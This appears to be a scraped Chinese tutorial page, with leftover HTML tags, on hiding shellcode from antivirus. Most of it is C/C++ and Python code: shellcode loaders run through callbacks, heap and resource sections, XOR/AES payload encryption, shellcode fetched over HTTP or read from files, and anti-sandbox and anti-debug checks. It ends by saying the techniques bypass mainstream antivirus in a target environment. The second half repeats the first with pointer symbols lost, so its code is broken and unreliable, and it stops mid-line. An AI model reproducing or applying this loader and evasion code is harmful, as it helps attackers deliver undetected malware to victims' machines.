C\/C++ Shellcode加密与分离加载技术详解<\/h1>

一、杀软检测机制与特点分析<\/h2>

1.1 常见杀软检测方式<\/h3>

静态查杀<\/strong>：<\/p>

通过文件特征码匹配病毒特征库<\/li>
部分杀软会使用沙箱运行程序几秒进行检测<\/li> <\/ul> <\/li>

动态查杀<\/strong>：<\/p>

运行时扫描程序内容匹配病毒特征<\/li>
EDR会挂钩敏感Windows API检查参数和调用栈<\/li> <\/ul> <\/li>

流量监控<\/strong>：<\/p>

分析网络数据包匹配恶意流量特征<\/li> <\/ul> <\/li>

行为监控<\/strong>：<\/p>

监控文件操作、注册表操作等异常行为<\/li> <\/ul> <\/li> <\/ol>
1.2 主流杀软特点对比<\/h3>

杀软<\/th> 静态查杀<\/th> 动态查杀<\/th> 其他特点<\/th> <\/tr> <\/thead>

火绒<\/td> 强<\/td> 无<\/td> 横向移动防护强<\/td> <\/tr>
360安全卫士\/杀毒<\/td> 强<\/td> 核晶模式开启时有<\/td> 核晶模式物理机默认开启<\/td> <\/tr>
360QVM<\/td> 极强(机器学习辅助)<\/td> -<\/td> 特征匹配严格<\/td> <\/tr>
Windows Defender<\/td> 强<\/td> 强<\/td> 监控HTTP流量<\/td> <\/tr>
卡巴斯基标准版<\/td> 一般<\/td> 强<\/td> -<\/td> <\/tr>
卡巴斯基企业版<\/td> 强<\/td> 强<\/td> -<\/td> <\/tr>
ESET<\/td> 强<\/td> 无<\/td> -<\/td> <\/tr> <\/tbody> <\/table>
二、Shellcode基础与免杀原理<\/h2>
2.1 Shellcode本质<\/h3>

一段可自主运行的机器代码<\/li>
无文件结构，不依赖编译环境<\/li>
需要通过Loader跳转到其地址执行<\/li> <\/ul>
2.2 免杀技术分类<\/h3>

Shellcode层面<\/strong>：<\/p>

自写打乱（杀毒不认识）<\/li>
加密混淆（找到但不知道）<\/li>
分离隐藏（杀毒找不到）<\/li>
注入回调（干扰杀毒）<\/li> <\/ul> <\/li>

Loader层面<\/strong>：<\/p>

APC加载、DLL镂空注入<\/li>
SEH加密、TLS加载<\/li>
UUID加载、创建堆加载<\/li>
回调函数加载、内联汇编加载<\/li> <\/ul> <\/li> <\/ol>
三、Shellcode加载技术详解<\/h2>
3.1 基础加载方式<\/h3>
1. 内联汇编加载<\/h4>
#include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> buf[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> main<\/span>() { <\/span><\/span> __asm<\/span> { <\/span><\/span> lea eax, buf <\/span><\/span> call eax <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 函数指针加载<\/h4> #pragma comment(linker, "\/section:.data,RWE") <\/span><\/span><\/span>#include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> buf[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> main<\/span>() { <\/span><\/span> ((void<\/span>(*<\/span>)(void<\/span>)) &<\/span> buf)(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 回调函数加载<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> shellcode[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> CallBack<\/span>() { <\/span><\/span> void<\/span>*<\/span> p =<\/span> VirtualAlloc(NULL, sizeof<\/span>(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); <\/span><\/span> memcpy(p, shellcode, sizeof<\/span>(shellcode)); <\/span><\/span> EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)p, NULL); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> CallBack(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>4. 创建堆加载<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> shellcode[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> main<\/span>() { <\/span><\/span> HANDLE HeapHandle =<\/span> HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof<\/span>(shellcode), 0<\/span>); <\/span><\/span> char<\/span>*<\/span> buffer =<\/span> (char<\/span>*<\/span>)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, sizeof<\/span>(shellcode)); <\/span><\/span> memcpy(buffer, shellcode, sizeof<\/span>(shellcode)); <\/span><\/span> ((void<\/span>(*<\/span>)(void<\/span>)) buffer)(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2 环境配置要点<\/h3> 关闭SDL检测<\/li> 设置运行库为多线程(\/MT)<\/li> 禁用安全检查(GS)<\/li> 关闭生成清单<\/li> 编译时选择Release模式<\/li> <\/ol> 四、Shellcode加密技术<\/h2> 4.1 XOR加密<\/h3> 加密Python代码：<\/h4> def<\/span> xor_encrypt<\/span>(shellcode, key): <\/span><\/span> encrypted =<\/span> bytearray() <\/span><\/span> key_len =<\/span> len(key) <\/span><\/span> for<\/span> i in<\/span> range(len(shellcode)): <\/span><\/span> encrypted.<\/span>append(shellcode[i] ^<\/span> key[i %<\/span> key_len]) <\/span><\/span> return<\/span> encrypted <\/span><\/span> <\/span><\/span>key =<\/span> b<\/span>'xuan@qazwss'<\/span> <\/span><\/span>encrypted =<\/span> xor_encrypt(shellcode, key) <\/span><\/span><\/code><\/pre>解密C++代码：<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>char<\/span> encrypted[] =<\/span> "<\/span>\x84\x9d\xe8<\/span>..."<\/span>; <\/span><\/span>char<\/span> key[] =<\/span> "qawwcadwdawdw"<\/span>; <\/span><\/span>unsigned<\/span> char<\/span> shellcode[sizeof<\/span> encrypted]; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> int<\/span> keylength =<\/span> strlen(key); <\/span><\/span> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> sizeof<\/span> encrypted; i++<\/span>) { <\/span><\/span> shellcode[i] =<\/span> encrypted[i] ^<\/span> key[i %<\/span> keylength]; <\/span><\/span> } <\/span><\/span> <\/span><\/span> DWORD dwOldPro; <\/span><\/span> VirtualProtect(shellcode, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldPro); <\/span><\/span> EnumUILanguages((UILANGUAGE_ENUMPROC)shellcode, 0<\/span>, 0<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>4.2 AES加密<\/h3> 加密代码：<\/h4> #include<\/span> <wincrypt.h><\/span> <\/span><\/span><\/span>#pragma comment(lib, "crypt32.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>BOOL AESEncrypt<\/span>(BYTE*<\/span> pData, DWORD dwDataSize, BYTE*<\/span> pKey, DWORD dwKeySize, <\/span><\/span> BYTE**<\/span> ppEncrypted, DWORD*<\/span> pdwEncryptedSize) { <\/span><\/span> \/\/ 初始化CSP <\/span><\/span><\/span><\/span> HCRYPTPROV hProv; <\/span><\/span> CryptAcquireContext(&<\/span>hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT); <\/span><\/span> <\/span><\/span> \/\/ 创建哈希对象 <\/span><\/span><\/span><\/span> HCRYPTHASH hHash; <\/span><\/span> CryptCreateHash(hProv, CALG_SHA_256, 0<\/span>, 0<\/span>, &<\/span>hHash); <\/span><\/span> <\/span><\/span> \/\/ 哈希密钥 <\/span><\/span><\/span><\/span> CryptHashData(hHash, pKey, dwKeySize, 0<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 派生密钥 <\/span><\/span><\/span><\/span> HCRYPTKEY hKey; <\/span><\/span> CryptDeriveKey(hProv, CALG_AES_256, hHash, 0<\/span>, &<\/span>hKey); <\/span><\/span> <\/span><\/span> \/\/ 加密数据 <\/span><\/span><\/span><\/span> DWORD dwEncryptedSize =<\/span> dwDataSize; <\/span><\/span> CryptEncrypt(hKey, 0<\/span>, TRUE, 0<\/span>, NULL, &<\/span>dwEncryptedSize, 0<\/span>); <\/span><\/span> <\/span><\/span> BYTE*<\/span> pEncrypted =<\/span> (BYTE*<\/span>)malloc(dwEncryptedSize); <\/span><\/span> memcpy(pEncrypted, pData, dwDataSize); <\/span><\/span> DWORD dwFinalSize =<\/span> dwDataSize; <\/span><\/span> CryptEncrypt(hKey, 0<\/span>, TRUE, 0<\/span>, pEncrypted, &<\/span>dwFinalSize, dwEncryptedSize); <\/span><\/span> <\/span><\/span> *<\/span>ppEncrypted =<\/span> pEncrypted; <\/span><\/span> *<\/span>pdwEncryptedSize =<\/span> dwFinalSize; <\/span><\/span> <\/span><\/span> \/\/ 清理 <\/span><\/span><\/span><\/span> CryptDestroyKey(hKey); <\/span><\/span> CryptDestroyHash(hHash); <\/span><\/span> CryptReleaseContext(hProv, 0<\/span>); <\/span><\/span> return<\/span> TRUE; <\/span><\/span>} <\/span><\/span><\/code><\/pre>解密代码：<\/h4> BOOL AESDecrypt<\/span>(BYTE*<\/span> pEncrypted, DWORD dwEncryptedSize, BYTE*<\/span> pKey, <\/span><\/span> DWORD dwKeySize, BYTE**<\/span> ppDecrypted, DWORD*<\/span> pdwDecryptedSize) { <\/span><\/span> \/\/ 类似加密过程，使用CryptDecrypt代替CryptEncrypt <\/span><\/span><\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> ExecuteShellcode<\/span>(BYTE*<\/span> shellcode, DWORD size) { <\/span><\/span> void<\/span>*<\/span> execMem =<\/span> VirtualAlloc(NULL, size, MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_EXECUTE_READWRITE); <\/span><\/span> memcpy(execMem, shellcode, size); <\/span><\/span> ((void<\/span>(*<\/span>)())execMem)(); <\/span><\/span> VirtualFree(execMem, 0<\/span>, MEM_RELEASE); <\/span><\/span>} <\/span><\/span><\/code><\/pre>五、Shellcode分离技术<\/h2> 5.1 文件分离<\/h3> #include<\/span> <fstream><\/span> <\/span><\/span><\/span>#include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> load<\/span>(char<\/span>*<\/span> buf, int<\/span> size) { <\/span><\/span> char<\/span>*<\/span> shellcode =<\/span> (char<\/span>*<\/span>)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); <\/span><\/span> CopyMemory(shellcode, buf, size); <\/span><\/span> CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)shellcode, NULL, NULL, NULL); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> ifstream infile("p64.bin"<\/span>, ios::<\/span>binary); <\/span><\/span> infile.seekg(0<\/span>, infile.end); <\/span><\/span> int<\/span> length =<\/span> infile.tellg(); <\/span><\/span> infile.seekg(0<\/span>, infile.beg); <\/span><\/span> <\/span><\/span> char<\/span>*<\/span> data =<\/span> new<\/span> char<\/span>[length]; <\/span><\/span> infile.read(data, length); <\/span><\/span> <\/span><\/span> \/\/ 解密 <\/span><\/span><\/span><\/span> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> length; i++<\/span>) { <\/span><\/span> data[i] ^=<\/span> 0x39<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> load(data, length); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.2 HTTP请求分离<\/h3> #include<\/span> <winhttp.h><\/span> <\/span><\/span><\/span>#pragma comment(lib, "winhttp.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>vector<<\/span>unsigned<\/span> char<\/span>><\/span> DownloadData(const<\/span> wchar_t<\/span>*<\/span> host, int<\/span> port, const<\/span> wchar_t<\/span>*<\/span> path) { <\/span><\/span> HINTERNET hSession =<\/span> WinHttpOpen(L<\/span>"WinHTTP Example\/1.0"<\/span>, <\/span><\/span> WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, <\/span><\/span> WINHTTP_NO_PROXY_NAME, <\/span><\/span> WINHTTP_NO_PROXY_BYPASS, 0<\/span>); <\/span><\/span> <\/span><\/span> HINTERNET hConnect =<\/span> WinHttpConnect(hSession, host, port, 0<\/span>); <\/span><\/span> HINTERNET hRequest =<\/span> WinHttpOpenRequest(hConnect, L<\/span>"GET"<\/span>, path, NULL, <\/span><\/span> WINHTTP_NO_REFERER, <\/span><\/span> WINHTTP_DEFAULT_ACCEPT_TYPES, 0<\/span>); <\/span><\/span> <\/span><\/span> WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0<\/span>, <\/span><\/span> WINHTTP_NO_REQUEST_DATA, 0<\/span>, 0<\/span>, 0<\/span>); <\/span><\/span> WinHttpReceiveResponse(hRequest, NULL); <\/span><\/span> <\/span><\/span> vector<<\/span>unsigned<\/span> char<\/span>><\/span> result; <\/span><\/span> DWORD dwSize =<\/span> 0<\/span>; <\/span><\/span> do<\/span> { <\/span><\/span> WinHttpQueryDataAvailable(hRequest, &<\/span>dwSize); <\/span><\/span> vector<<\/span>unsigned<\/span> char<\/span>><\/span> buffer(dwSize); <\/span><\/span> DWORD dwDownloaded =<\/span> 0<\/span>; <\/span><\/span> WinHttpReadData(hRequest, buffer.data(), dwSize, &<\/span>dwDownloaded); <\/span><\/span> result.insert(result.end(), buffer.begin(), buffer.begin() +<\/span> dwDownloaded); <\/span><\/span> } while<\/span> (dwSize ><\/span> 0<\/span>); <\/span><\/span> <\/span><\/span> WinHttpCloseHandle(hRequest); <\/span><\/span> WinHttpCloseHandle(hConnect); <\/span><\/span> WinHttpCloseHandle(hSession); <\/span><\/span> return<\/span> result; <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.3 参数传递分离<\/h3> int<\/span> main<\/span>(int<\/span> argc, char<\/span>*<\/span> argv[]) { <\/span><\/span> if<\/span> (argc <<\/span> 2<\/span>) { <\/span><\/span> printf("Usage: %s <shellcode_file><\/span>\n<\/span>"<\/span>, argv[0<\/span>]); <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> ifstream infile(argv[1<\/span>], ios::<\/span>binary); <\/span><\/span> \/\/ ... 读取和解密过程与文件分离相同 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>六、反沙箱与反调试技术<\/h2> 6.1 反沙箱检测<\/h3> bool<\/span> detect_sandbox<\/span>() { <\/span><\/span> \/\/ 时间差检测 <\/span><\/span><\/span><\/span> auto<\/span> start =<\/span> chrono::<\/span>high_resolution_clock::<\/span>now(); <\/span><\/span> this_thread::<\/span>sleep_for(chrono::<\/span>milliseconds(100<\/span>)); <\/span><\/span> auto<\/span> end =<\/span> chrono::<\/span>high_resolution_clock::<\/span>now(); <\/span><\/span> auto<\/span> elapsed =<\/span> chrono::<\/span>duration_cast<<\/span>chrono::<\/span>milliseconds><\/span>(end -<\/span> start); <\/span><\/span> if<\/span> (elapsed.count() <<\/span> 100<\/span>) return<\/span> true; <\/span><\/span> <\/span><\/span> \/\/ 内存检测 <\/span><\/span><\/span><\/span> MEMORYSTATUSEX statex; <\/span><\/span> statex.dwLength =<\/span> sizeof<\/span>(statex); <\/span><\/span> GlobalMemoryStatusEx(&<\/span>statex); <\/span><\/span> SYSTEM_INFO systemInfo; <\/span><\/span> GetSystemInfo(&<\/span>systemInfo); <\/span><\/span> if<\/span> (statex.ullTotalPageFile \/<\/span> systemInfo.dwPageSize <<\/span> 4000000<\/span>) return<\/span> true; <\/span><\/span> <\/span><\/span> \/\/ CPU核心数检测 <\/span><\/span><\/span><\/span> if<\/span> (systemInfo.dwNumberOfProcessors <=<\/span> 4<\/span>) return<\/span> true; <\/span><\/span> <\/span><\/span> \/\/ 网络适配器检测 <\/span><\/span><\/span><\/span> PIP_ADAPTER_ADDRESSES pAddresses =<\/span> (PIP_ADAPTER_ADDRESSES)new<\/span> BYTE[15000<\/span>]; <\/span><\/span> if<\/span> (GetAdaptersAddresses(AF_UNSPEC, GAA_FLAG_INCLUDE_PREFIX, <\/span><\/span> NULL, pAddresses, 15000<\/span>) ==<\/span> ERROR_SUCCESS) { <\/span><\/span> int<\/span> numAdapters =<\/span> 0<\/span>; <\/span><\/span> while<\/span> (pAddresses) { <\/span><\/span> if<\/span> (pAddresses-><\/span>OperStatus ==<\/span> IfOperStatusUp) numAdapters++<\/span>; <\/span><\/span> pAddresses =<\/span> pAddresses-><\/span>Next; <\/span><\/span> } <\/span><\/span> if<\/span> (numAdapters <<\/span> 2<\/span>) return<\/span> true; <\/span><\/span> } <\/span><\/span> <\/span><\/span> return<\/span> false; <\/span><\/span>} <\/span><\/span><\/code><\/pre>6.2 反调试技术<\/h3> int<\/span> main<\/span>() { <\/span><\/span> \/\/ 调试器检测 <\/span><\/span><\/span><\/span> if<\/span> (IsDebuggerPresent()) return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 远程调试检测 <\/span><\/span><\/span><\/span> BOOL bDebuggerPresent =<\/span> FALSE; <\/span><\/span> if<\/span> (CheckRemoteDebuggerPresent(GetCurrentProcess(), &<\/span>bDebuggerPresent) &&<\/span> bDebuggerPresent) <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 远程桌面检测 <\/span><\/span><\/span><\/span> if<\/span> (GetSystemMetrics(SM_REMOTESESSION) !=<\/span> 0<\/span>) return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 时间戳计数器检测 <\/span><\/span><\/span><\/span> unsigned<\/span> __int64<\/span> start =<\/span> __rdtsc(); <\/span><\/span> Sleep(100<\/span>); <\/span><\/span> unsigned<\/span> __int64<\/span> end =<\/span> __rdtsc(); <\/span><\/span> if<\/span> ((end -<\/span> start) ><\/span> 100000000<\/span>) return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 正常执行代码... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>七、资源节加载技术<\/h2> #include<\/span> "resource.h"<\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> \/\/ 查找资源 <\/span><\/span><\/span><\/span> HRSRC res =<\/span> FindResource(NULL, MAKEINTRESOURCE(IDR_SC1), L<\/span>"sc"<\/span>); <\/span><\/span> HGLOBAL resData =<\/span> LoadResource(NULL, res); <\/span><\/span> DWORD size =<\/span> SizeofResource(NULL, res); <\/span><\/span> <\/span><\/span> \/\/ 分配内存 <\/span><\/span><\/span><\/span> LPSTR shell =<\/span> (LPSTR)VirtualAlloc(0<\/span>, size, MEM_COMMIT, PAGE_READWRITE); <\/span><\/span> memcpy(shell, resData, size); <\/span><\/span> <\/span><\/span> \/\/ 解密 <\/span><\/span><\/span><\/span> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> size; i++<\/span>) { <\/span><\/span> shell[i] ^=<\/span> 0x39<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 执行 <\/span><\/span><\/span><\/span> VirtualProtect(shell, size, PAGE_EXECUTE_READ, &<\/span>oldProtect); <\/span><\/span> ((void<\/span>(*<\/span>)(void<\/span>)) shell)(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>八、综合免杀方案设计<\/h2> 多层加密<\/strong>：XOR+AES组合加密<\/li> 分离加载<\/strong>：通过网络或文件分离Shellcode<\/li> 反检测<\/strong>：集成反沙箱和反调试技术<\/li> 合法程序模仿<\/strong>：使用系统API作为加载入口点<\/li> 行为混淆<\/strong>：添加无害API调用干扰行为分析<\/li> <\/ol> 九、工具与资源<\/h2> 开发工具<\/strong>：<\/p> Visual Studio（配置绕过360QVM）<\/li> Ollydbg（分析Shellcode）<\/li> 010 Editor（二进制编辑）<\/li> <\/ul> <\/li> C2框架<\/strong>：<\/p> Cobalt Strike<\/li> Metasploit<\/li> Viper\/Ghost<\/li> <\/ul> <\/li> 检测平台<\/strong>：<\/p> 微步在线云沙箱<\/li> VirusTotal<\/li> <\/ul> <\/li> <\/ol> 十、注意事项<\/h2> 编译时选择正确的平台（x86\/x64）<\/li> 测试时关闭杀软实时防护<\/li> 不同杀软组合测试<\/li> 虚拟机与物理机环境差异<\/li> 网络通信行为隐蔽性<\/li> <\/ol> 通过以上技术的组合应用，可以有效提高Shellcode的免杀能力，绕过主流杀毒软件的检测。实际应用中应根据目标环境灵活调整技术方案。<\/p>

杀软<\/th>	静态查杀<\/th>	动态查杀<\/th>	其他特点<\/th> <\/tr> <\/thead>
火绒<\/td>	强<\/td>	无<\/td>	横向移动防护强<\/td> <\/tr>
360安全卫士\/杀毒<\/td>	强<\/td>	核晶模式开启时有<\/td>	核晶模式物理机默认开启<\/td> <\/tr>
360QVM<\/td>	极强(机器学习辅助)<\/td>	-<\/td>	特征匹配严格<\/td> <\/tr>
Windows Defender<\/td>	强<\/td>	强<\/td>	监控HTTP流量<\/td> <\/tr>
卡巴斯基标准版<\/td>	一般<\/td>	强<\/td>	-<\/td> <\/tr>
卡巴斯基企业版<\/td>	强<\/td>	强<\/td>	-<\/td> <\/tr>
ESET<\/td>	强<\/td>	无<\/td>	-<\/td> <\/tr> <\/tbody> <\/table> 二、Shellcode基础与免杀原理<\/h2> 2.1 Shellcode本质<\/h3> 一段可自主运行的机器代码<\/li> 无文件结构，不依赖编译环境<\/li> 需要通过Loader跳转到其地址执行<\/li> <\/ul> 2.2 免杀技术分类<\/h3> Shellcode层面<\/strong>：<\/p> 自写打乱（杀毒不认识）<\/li> 加密混淆（找到但不知道）<\/li> 分离隐藏（杀毒找不到）<\/li> 注入回调（干扰杀毒）<\/li> <\/ul> <\/li> Loader层面<\/strong>：<\/p> APC加载、DLL镂空注入<\/li> SEH加密、TLS加载<\/li> UUID加载、创建堆加载<\/li> 回调函数加载、内联汇编加载<\/li> <\/ul> <\/li> <\/ol> 三、Shellcode加载技术详解<\/h2> 3.1 基础加载方式<\/h3> 1. 内联汇编加载<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> buf[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> main<\/span>() { <\/span><\/span> __asm<\/span> { <\/span><\/span> lea eax, buf <\/span><\/span> call eax <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 函数指针加载<\/h4> #pragma comment(linker, "\/section:.data,RWE") <\/span><\/span><\/span>#include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> buf[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> main<\/span>() { <\/span><\/span> ((void<\/span>(<\/span>)(void<\/span>)) &<\/span> buf)(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 回调函数加载<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> shellcode[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> CallBack<\/span>() { <\/span><\/span> void<\/span><\/span> p =<\/span> VirtualAlloc(NULL, sizeof<\/span>(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); <\/span><\/span> memcpy(p, shellcode, sizeof<\/span>(shellcode)); <\/span><\/span> EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)p, NULL); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> CallBack(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>4. 创建堆加载<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> shellcode[] =<\/span> "<\/span>\xfc\xe8\x89<\/span>..."<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> main<\/span>() { <\/span><\/span> HANDLE HeapHandle =<\/span> HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof<\/span>(shellcode), 0<\/span>); <\/span><\/span> char<\/span><\/span> buffer =<\/span> (char<\/span><\/span>)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, sizeof<\/span>(shellcode)); <\/span><\/span> memcpy(buffer, shellcode, sizeof<\/span>(shellcode)); <\/span><\/span> ((void<\/span>(<\/span>)(void<\/span>)) buffer)(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2 环境配置要点<\/h3> 关闭SDL检测<\/li> 设置运行库为多线程(\/MT)<\/li> 禁用安全检查(GS)<\/li> 关闭生成清单<\/li> 编译时选择Release模式<\/li> <\/ol> 四、Shellcode加密技术<\/h2> 4.1 XOR加密<\/h3> 加密Python代码：<\/h4> def<\/span> xor_encrypt<\/span>(shellcode, key): <\/span><\/span> encrypted =<\/span> bytearray() <\/span><\/span> key_len =<\/span> len(key) <\/span><\/span> for<\/span> i in<\/span> range(len(shellcode)): <\/span><\/span> encrypted.<\/span>append(shellcode[i] ^<\/span> key[i %<\/span> key_len]) <\/span><\/span> return<\/span> encrypted <\/span><\/span> <\/span><\/span>key =<\/span> b<\/span>'xuan@qazwss'<\/span> <\/span><\/span>encrypted =<\/span> xor_encrypt(shellcode, key) <\/span><\/span><\/code><\/pre>解密C++代码：<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>char<\/span> encrypted[] =<\/span> "<\/span>\x84\x9d\xe8<\/span>..."<\/span>; <\/span><\/span>char<\/span> key[] =<\/span> "qawwcadwdawdw"<\/span>; <\/span><\/span>unsigned<\/span> char<\/span> shellcode[sizeof<\/span> encrypted]; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> int<\/span> keylength =<\/span> strlen(key); <\/span><\/span> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> sizeof<\/span> encrypted; i++<\/span>) { <\/span><\/span> shellcode[i] =<\/span> encrypted[i] ^<\/span> key[i %<\/span> keylength]; <\/span><\/span> } <\/span><\/span> <\/span><\/span> DWORD dwOldPro; <\/span><\/span> VirtualProtect(shellcode, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldPro); <\/span><\/span> EnumUILanguages((UILANGUAGE_ENUMPROC)shellcode, 0<\/span>, 0<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>4.2 AES加密<\/h3> 加密代码：<\/h4> #include<\/span> <wincrypt.h><\/span> <\/span><\/span><\/span>#pragma comment(lib, "crypt32.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>BOOL AESEncrypt<\/span>(BYTE<\/span> pData, DWORD dwDataSize, BYTE<\/span> pKey, DWORD dwKeySize, <\/span><\/span> BYTE<\/span> ppEncrypted, DWORD<\/span> pdwEncryptedSize) { <\/span><\/span> \/\/ 初始化CSP <\/span><\/span><\/span><\/span> HCRYPTPROV hProv; <\/span><\/span> CryptAcquireContext(&<\/span>hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT); <\/span><\/span> <\/span><\/span> \/\/ 创建哈希对象 <\/span><\/span><\/span><\/span> HCRYPTHASH hHash; <\/span><\/span> CryptCreateHash(hProv, CALG_SHA_256, 0<\/span>, 0<\/span>, &<\/span>hHash); <\/span><\/span> <\/span><\/span> \/\/ 哈希密钥 <\/span><\/span><\/span><\/span> CryptHashData(hHash, pKey, dwKeySize, 0<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 派生密钥 <\/span><\/span><\/span><\/span> HCRYPTKEY hKey; <\/span><\/span> CryptDeriveKey(hProv, CALG_AES_256, hHash, 0<\/span>, &<\/span>hKey); <\/span><\/span> <\/span><\/span> \/\/ 加密数据 <\/span><\/span><\/span><\/span> DWORD dwEncryptedSize =<\/span> dwDataSize; <\/span><\/span> CryptEncrypt(hKey, 0<\/span>, TRUE, 0<\/span>, NULL, &<\/span>dwEncryptedSize, 0<\/span>); <\/span><\/span> <\/span><\/span> BYTE<\/span> pEncrypted =<\/span> (BYTE<\/span>)malloc(dwEncryptedSize); <\/span><\/span> memcpy(pEncrypted, pData, dwDataSize); <\/span><\/span> DWORD dwFinalSize =<\/span> dwDataSize; <\/span><\/span> CryptEncrypt(hKey, 0<\/span>, TRUE, 0<\/span>, pEncrypted, &<\/span>dwFinalSize, dwEncryptedSize); <\/span><\/span> <\/span><\/span> <\/span>ppEncrypted =<\/span> pEncrypted; <\/span><\/span> <\/span>pdwEncryptedSize =<\/span> dwFinalSize; <\/span><\/span> <\/span><\/span> \/\/ 清理 <\/span><\/span><\/span><\/span> CryptDestroyKey(hKey); <\/span><\/span> CryptDestroyHash(hHash); <\/span><\/span> CryptReleaseContext(hProv, 0<\/span>); <\/span><\/span> return<\/span> TRUE; <\/span><\/span>} <\/span><\/span><\/code><\/pre>解密代码：<\/h4> BOOL AESDecrypt<\/span>(BYTE<\/span> pEncrypted, DWORD dwEncryptedSize, BYTE<\/span> pKey, <\/span><\/span> DWORD dwKeySize, BYTE*<\/span> ppDecrypted, DWORD<\/span> pdwDecryptedSize) { <\/span><\/span> \/\/ 类似加密过程，使用CryptDecrypt代替CryptEncrypt <\/span><\/span><\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> ExecuteShellcode<\/span>(BYTE<\/span> shellcode, DWORD size) { <\/span><\/span> void<\/span><\/span> execMem =<\/span> VirtualAlloc(NULL, size, MEM_COMMIT 